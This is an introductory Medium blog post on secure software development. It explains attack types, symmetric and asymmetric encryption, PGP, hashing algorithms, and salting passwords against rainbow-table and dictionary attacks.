Geek Culture
Published in

Geek Culture

Encryption, Hashing, and Secure Software Development

Source (https://wallpaperaccess.com/cryptography)

If you are building software without having any concern about the security aspects of the software, it will be like building your own house without locks on the doors and windows. So every Software Engineer needs to get an idea about the ways we can secure our applications.

When it comes to Secure Software development, it is broadly classified into two parts as Application Security and Software Security.

  • Application Security: A way to defend against software exploits after the deployment is complete.
  • Software Security: A way to defend against software exploits by building the software to be secure. (build security into the software)

To avoid security threats in the software development process different strategies are used. Two of the basics strategies are Vulnerability Testing and Penetration Testing. Vulnerability testing is the process of identifying and quantifying vulnerability in an environment. In other words, it is the process of evaluating security risks in software systems to reduce the probability of threats. Penetration testing is the simulating the action of an external or internal attacker that aims to breach the security of the software. Some of the issues with the security breaches are immediate financial loss, reputation loss, and lawsuits. When we consider the types of security attacks, it is categorized as leakage, tampering, resource stealing, vandalism, and denial of service.

  • Leakage: Information leaving the system.
  • Tampering: unauthorized information altering.
  • Resource Stealing: illegal use of resources.
  • Vandalism: Disturbing correct system operation.
  • Denial of Service: Disrupting legitimate system use.

When we talk about the methods of attacks, it is categorized as eavesdropping, masquerading, message tampering, replaying, and flooding. Therefore to avoid these attacks and build Secure Softwares, we need to be aware of the remedies available for them;

  • Eavesdropping: Obtaining message copies without authority.
  • Masquerading (Spoofing): Using the identity of another person without authority.
  • Message tampering: Intercepting and altering messages.
  • Replaying: Storing messages and sending them later.
  • Flooding: Sending too many messages

What is Secure Software Engineering?

“Reliable software does what it is supposed to do. Secure software does that and nothing else” (Ivan Arce)

Cryptography

Security of data at rest and data at transport is one of the basic security requirements to consider when developing software. Cryptography is the art/science of Secret writing. The goal is to keep information from those who aren’t supposed to see it by “scrambling” the original data. We use a well-known algorithm to scramble data. The cryptographic algorithms have two inputs as data & key. The key is known only to authorized users. Encryptions and Hashing are two main parts of cryptography. Encryption is a two-way function; what is encrypted can be decrypted with the proper key. That means when we encrypt (scramble) data using an encryption algorithm and a key, we can again decrypt(unscramble) data using the proper key. Hashing is a one-way function that scrambles plain text to produce a unique message digest or hash code. Therefore when we use hashing algorithms to hash(scramble) the data, it is not reversible.

Kerckhoff’s Principle

•A cryptosystem should be secure even if everything about the system, except the key, is public knowledge. (Opposite of security through obscurity)

•A famous counter-example: Enigma in WWII, how British forces break the encryption of the war messages of Nazi Germany( if you have watched the movie The Imitation Game (2014) you know what i’m taking about….😁😁)

1. Encryptions

Figure 1: The process of Encryption and Decryption

Encryption and Decryption Algorithms (E, D) are widely known and used in co-operation with keys to convert plain text to cipher and cipher to pain text respectively. Keys (KE, KD) may be Symmetric or Asymmetric in nature. The Ciphertext is the only information that’s available to the public world. The Plaintext is known only by the people with the keys (in an ideal world…😁 ). The Plaintext is the message before encryption. The Ciphertext is the message after encryption. Key is the information needed to convert from Plaintext to Ciphertext (and vice-versa). Apart from that Confusion and Diffusion are two key factors of the Encryption system.

  • Confusion: Hides the relation between Key and Ciphertext.
  • Diffusion: Hides the relation between Ciphertext and Plaintext.

In the above paragraph, I have mentioned two types of keys used in the encryption process; Symmetric Key Encryption and Asymmetric Key Encryption.

1). Symmetric Key Encryption: This is a type of encryption where only one key (a secret key) is used for both encryption and decryption of plaintext and ciphertext. The entities communicating via symmetric encryption must exchange the key. So that it can be used in the decryption process. There are several types of Symmetric Key encryptions;

  • Data Encryption Standard (DES)
  • Electronic Code Book (ECB)
  • Cipher block Chain(CBC)
  • Advanced Encryption Standard (AES)

The main advantage of symmetric key encryption is it is Fater since using one Key. But the drawbacks are Key management and distribution issues and guarantees only confidentiality.

Figure 2: Symmetric Key Encryption Process

2). Asymmetric Key Encryption: This is a type of encryption that uses two separate, yet mathematically related keys to encrypt and decrypt data. The public key encrypts data while its corresponding private key decrypts it. The public is available for the general public, and the private key is secret. Generation of the private key, given the public key, is computationally hard. The General Process of Asymmetric Key Encryption;

  • The recipient generates a pair of keys(Public and Private) and publishes the public key by a trusted service.
  • The sender obtains the public key of a recipient and uses it to encode the message, then sends it to the recipient.
  • The recipient decodes the message using the key that the recipient kept in private. In order to reply, the recipient uses the sender’s public key and the recipient decodes the message with his or her private key.
  • Information cannot eavesdrop from messages that are captured, as the eavesdropper does not have the private key to decode the message. Also, messages cannot tamper in a meaningful way as this would require to get the plain text message.

The main advantage of asymmetric encryption is that it will get rid of the key distribution problem since using two key pairs. the disadvantage is that it will be slow due to the generation and usage of two key pairs. Some of the Asymmetric Key Encryptions are;

  • RSA Algorithm
  • Diffie Hellman Algorithm
  • Diffie Hellman Elliptic Curve Algorithm
  • Digital Signature Algorithm
Figure 3: Asymmetric Key Encryption Process

PGP is for the encryption of email messages and digital signatures. It combines Symmetric and Asymmetric encryption together.

** Symmetric has a key distribution problem

** Asymmetric is slower, but no key distribution pro

Therefore as a solution, it uses Asymmetric Encryption to encrypt and distribute key used for Symmetric encryption.

2. Hashing

Hashing is the process of obtaining fixed-size blocks from plaintext and updating the state of internal bit representation(160 bits, 128 bits, 256 bits, etc) of hashing algorithm iteratively. After that, at the end of all the iterations, get the state of the internal bit representation called the message digest or hash code. A Hash Function is used to generate the new scramble data according to advanced mathematical algorithms. The result of a hash function is known as a hash code or sometimes a message digest. A good hash function uses a one-way hashing algorithm, or in other words, the hash value cannot be converted back into the original value. It is really difficult to mess with a good hashing function because if you change one character in a stream of characters, the hash value will be completely different from the previous hash value. There are several types of hashing algorithms, but some of them are outdated now;

  • MD5 ((size of hash code: 128 bits)
  • SHA-1 (size of hash code: 160 bits)
  • SHA-256 (size of hash code: 256 bits)
  • SHA-512 (size of hash code: 512 bits)

Some applications of hashing are password protection, designing blockchain applications, and protect the integrity of software licenses and integrity of digital certificates. So when talking about password protection, if any data leakage happens, since the hashed password is stored in the database, it will be difficult to guess the original password from the hashed password for the attacker, because of the one-way nature of the hash functions. But if we are just storing the hash value of the password it is susceptible to Rainbow Table Attacks and Dictionary Attacks.

  • Rainbow Tables Attacks: A precomputed table for reversing cryptographic hash functions, usually for cracking passwords.
  • Dictionary Attacks: Attempting to find original plain text by hashing common passwords and comparing them to the target value.

But we can eliminate these attacks by using Salt and Pepper with the hashing functions. They are a fixed amount of random characters added to the password at random positions before hashing. The main difference between Salt and Pepper is that Salt is stored with the respective hash password in the database, but Pepper is not stored with the respective hash passwords in the database.

So the modern cryptography concern mainly with the following objectives;

  1. Confidentiality: The information cannot be understood by any person whom the information was unintended.
  2. Integrity: Alteration to the data in storage or transit between sender and receiver can not be changed without the alteration being detected.
  3. Non-Repudiation: the creator/sender of the information cannot deny at a later stage his or her intentions in the creation or transmission of the information.
  4. Authentication: the sender and receiver can confirm each other’s identity and the origin/destination of the information.

Therefore, Symmetric Key Encryption helps us to achieve confidentiality. Asymmetric Key Encryption helps us to achieve authentication, confidentiality, and Non-repudiation, and Hashing helps us to achieve Integrity.

References

For further more clarification check these resources;

--

--

--

A new tech publication by Start it up (https://medium.com/swlh).

Recommended from Medium

API (Application Programming Interface) Security Best practices

MrWeb Finance | Smart Contract Audit Report | 2021 | QuillAudits

What happens when you www.holbertonschool.com, and hit enter.

The Burden of Proof: What You Really Need To Make A Case

{UPDATE} Ciudad cibernética Conductor Hack Free Resources Generator

Three reasons why physical wallets are outdated

ITV Hub+ ⋆ 01 Year Warranty

NEW FARM AVAILABLE: KCS-USDT AND USDC-USDT

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ranmal Dewage

Ranmal Dewage

Software Engineer at Sysco Labs, Graduate of Sri Lanka Institute of Information Technology (SLIIT).

More from Medium

New Worktree? No Problem

Why coding still matters

13 Reasons why you don’t need a degree to become a Software Engineer 💻

Interesting Tech Articles